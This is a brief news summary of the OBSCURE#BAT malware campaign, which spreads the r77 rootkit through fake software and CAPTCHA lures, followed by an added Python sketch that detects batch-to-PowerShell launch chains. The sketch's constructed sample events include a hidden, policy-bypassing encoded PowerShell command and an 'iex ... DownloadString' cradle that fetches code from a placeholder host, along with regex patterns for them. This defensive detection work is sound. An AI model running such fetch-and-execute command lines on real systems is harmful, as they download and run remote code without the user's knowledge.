Summary: A new malware campaign, dubbed OBSCURE#BAT, deploys an open-source rootkit called r77 through social engineering tactics, primarily targeting English-speaking users in the US, Canada, Germany, and the UK. The campaign utilizes obfuscated Windows batch scripts and PowerShell commands to establish persistence while evading detection. Security researchers highlighted its ability to masquerade as legitimate software and employ various misleading strategies to lure victims into executing the malicious scripts.
Affected: Users in the United States, Canada, Germany, and the United Kingdom
Key points:
- OBSCURE#BAT leverages social engineering tactics, including fake software downloads and CAPTCHA scams.
- The attack starts with a malicious batch script that uses PowerShell to deliver a more complex payload.
- The malware can modify registry keys, implement persistence techniques, and stay hidden while monitoring clipboard activity.
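The chain described in the key points above (an obfuscated batch script that hands off to PowerShell) leaves a process-creation trail that a defender can look for. The following detection sketch is an added example written for this summary; it is not code from the article or from the researchers who analysed OBSCURE#BAT. The event layout (parent image, child image, command line), the sample log lines and the scoring threshold are all constructed assumptions, not telemetry from the campaign.

```python
"""
Detection sketch: flag cmd.exe (i.e. a batch script) spawning PowerShell with
the evasion switches commonly seen in script-based loaders (hidden window,
execution-policy bypass, encoded command, in-memory download cradle).

The event format and the sample lines below are CONSTRUCTED for illustration,
loosely modelled on a process-creation record; they are not real campaign data.
"""
import ntpath
import re

# Constructed sample events: (parent image, child image, command line).
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\cmd.exe",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -w hidden -ep bypass -enc SQBFAFgAIAAo..."),
    (r"C:\Windows\explorer.exe",
     r"C:\Windows\System32\notepad.exe",
     "notepad.exe readme.txt"),
    (r"C:\Windows\System32\cmd.exe",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -NoProfile -Command Get-Date"),   # benign admin usage
    (r"C:\Windows\System32\cmd.exe",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -nop -w hidden -c \"iex (New-Object Net.WebClient)"
     ".DownloadString('http://example.invalid/x')\""),
]

# Indicators on the PowerShell command line. Each is weak on its own; the
# combination is what makes the launch worth a look.
SUSPICIOUS_PATTERNS = {
    "encoded_command":    re.compile(r"(?i)(?<=\s)-e(?:c|nc|ncodedcommand)?(?=\s)"),
    "hidden_window":      re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"),
    "exec_policy_bypass": re.compile(r"(?i)-e(?:p|xecutionpolicy)\s+bypass"),
    "no_profile":         re.compile(r"(?i)-nop(?:rofile)?\b"),
    "download_cradle":    re.compile(r"(?i)(?:\biex\b|invoke-expression|downloadstring|downloadfile)"),
}

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}


def score_event(event):
    """Return (is_batch_to_powershell_chain, sorted list of matched indicators)."""
    parent, image, cmdline = event
    # ntpath handles Windows separators even when this runs on a non-Windows host.
    chain = (ntpath.basename(parent).lower() == "cmd.exe"
             and ntpath.basename(image).lower() in POWERSHELL_IMAGES)
    hits = sorted(name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(cmdline))
    return chain, hits


def analyze(events, threshold=2):
    """Alert on cmd.exe -> PowerShell launches carrying >= `threshold` indicators.

    The threshold is an assumption chosen so that a plain `-NoProfile -Command`
    from an admin script does not fire on its own.
    """
    alerts = []
    for index, event in enumerate(events):
        chain, hits = score_event(event)
        if chain and len(hits) >= threshold:
            alerts.append({"index": index, "indicators": hits, "cmdline": event[2]})
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_EVENTS):
        print(f"event {alert['index']}: {alert['indicators']}")
        print(f"    {alert['cmdline']}")
```

Run as-is, it flags events 0 and 3 and leaves the benign `Get-Date` launch alone. In a real deployment the same scoring would be applied to process-creation telemetry from an EDR or Sysmon feed, and the indicator list and threshold tuned against the environment's own baseline of legitimate batch-driven PowerShell.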
Source: https://thehackernews.com/2025/03/obscurebat-malware-uses-fake-captcha.html